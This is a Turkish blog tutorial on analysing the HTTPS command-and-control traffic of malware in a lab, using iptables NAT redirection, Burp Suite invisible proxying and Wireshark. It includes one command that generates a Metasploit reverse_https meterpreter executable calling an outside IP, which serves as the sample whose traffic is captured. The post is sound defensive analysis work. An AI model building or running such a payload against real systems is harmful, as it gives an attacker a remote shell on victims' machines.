21 Aralık 2014

Ağ trafiği analizi, zararlı yazılım analizinin önemli bir bölümüdür. Günümüz zararlılarının komuta merkeziyle şifreli iletişim kurma eğilimi düşünüldüğünde bu trafiği şifresiz olarak elde edebilmenin gerekliliği de anlaşılmaktadır. Yazıda SSL kullanan bir zararlının trafiğinin nasıl analiz edilebileceği komuta merkeziyle HTTPS kullanarak iletişim kuran zararlı örneği üzerinden anlatılmıştır.

Kullanılan Araçlar:
  1. Burp Suite
  2. iptables
  3. Wireshark
  4. msfpayload

Zararlı analizinin diğer birçok adımında olduğu gibi ilk olarak güvenli ve kontrol edilebilir bir lab ortamı sağlamakla işe başlanılır. Bunun için zararlının çalıştırılacağı makine(örnekte WinXP) ve trafik analizi için kullanılacak makine(örnekte Kali Linux) tercihen host-only bir ağ arayüzü ile bağlanır. WinXP(örnekte: 10.10.10.50) varsayılan ağ geçidi olarak Linux makineyi(örnekte: 10.10.10.1) kullanacak şekilde ayarlanır.

untitled.JPG


Tabii aynı işlevi görecek alternatif yapılandırmalar da kullanılabilir.


Devamında Linux makineyi gateway olarak kullanabilmek için paket yönlendirme ve IP masquerade özellikleri aktif edilir. Terminalde
“sysctl -w net.ipv4.ip_forward=1”    komutu ile paket yönlendirme aktif edilir.
“sysctl -a | grep net.ipv4.ip_forward”    komutu ile değerin 1 olarak olduğu doğrulanabilir.
“iptables -t nat -A POSTROUTING -j MASQUERADE”        komutu ile masquerade özelliği aktif edilir. Bu aşamada linux sistemin internet(veya başka bir ağa) erişimi varsa WinXP üzerinden de erişimin gerçekleştirilebiliyor olması gerekir.


Yine iptables kullanılarak analiz edilmek istenen bağlantının kullandığı portlar trafiği inceleyip gerektiğinde değiştirebilmek için kullanılacak uygulamaya (Burp Suite) yönlendirilir. Bunun için
“iptables -t nat -A PREROUTING -m multiport -p tcp --dport 80,443 -i vmnet2 -j REDIRECT --to-ports 8080”    veya eşdeğer bir komut kullanılabilir. Komut kısaca iptables’a vmnet2 (1. adımda bahsedilen host-only ağ arayüzünün adı) arayüzünden gelen ve hedefi 80 veya 443 portları olan TCP bağlantılarını 8080 portuna yönlendirecek bir kural ekliyor. Yapılan işlemler sonucu iptables’a eklenen kurallar
“iptables -nL -t nat”    komutu ile görülebilir.


Chain PREROUTING (policy ACCEPT)
target     prot opt source               destination         
REDIRECT   tcp  --  0.0.0.0/0            0.0.0.0/0            multiport dports 80,443 redir ports 8080


Chain INPUT (policy ACCEPT)
target     prot opt source               destination         


Chain OUTPUT (policy ACCEPT)
target     prot opt source               destination         


Chain POSTROUTING (policy ACCEPT)
target     prot opt source               destination         
MASQUERADE  all  --  0.0.0.0/0            0.0.0.0/0


Daha sonra Burp Suite çalıştırılıp “Proxy” sekmesinin “Options” alt sekmesi açılır. “Proxy Listeners” bölümünden “Add” tuşuna basılıp ayarları şu şekilde yapılır.


Binding->Bind to Port: 8080
    ->Specific Address: 10.10.10.1
Request handling-> Support invisible proxying işaretli
Certificate->Generate CA-signed per-host certificates seçili


Bu ayarlar örnek olup farklı durumlar veya amaçlar için değişik ayarlar yapılması mümkündür. Daha sonra ayarlar kaydedilip yeni kaydedilen listenerın “Running” kutusu işaretlerek çalıştırılır. Bu aşamada yapılan ayarlar WinXP üzerinden bir web tarayıcısı yardımıyla doğrulanabilir.


Son olarak analiz edilmek istenen zararlı WinXP’de çalıştırılarak trafiği BurpSuite üzerinde incelenebilir. Örnekte Metasploit’in reverse_https payloadı çalıştırıldığında yaptığı HTTP GET isteği burp ile trafiğin tamamı da wireshark ile yakalanmıştır. Payloadın çalıştırılabilir hali msfpayload yüklü bir makinede  “msfpayload windows/meterpreter/reverse_https LHOST=100.200.111.22 LPORT=443 X > rhttps.exe”     komutu ile elde edilebilir.

Screenshot from 2014-04-16 01:16:07.png

Screenshot from 2014-04-16 01:16:23.png


Örneğin aksine bazı zararlılar BurpSuite’in sağladığı sertifikayı kabul etmeyebilirler. Bu durumda zararlıya çalışma anında bir debugger aracılığıyla müdahale ederek sertifikayı kabul etmesini sağlamak bir çözüm olabilir.

0 yorum:

Yorum Gönder

Her türlü eleştiri,yorum,ekleme ve düzeltmeye yönelik fikirlerinizi paylaşabilirsiniz.Hakaret içeren yorumlar filtrelenmektedir.

Makalelerin kötüye kullanım kullanıcının sorumluluğundadır. | networkpentest.net. Blogger tarafından desteklenmektedir.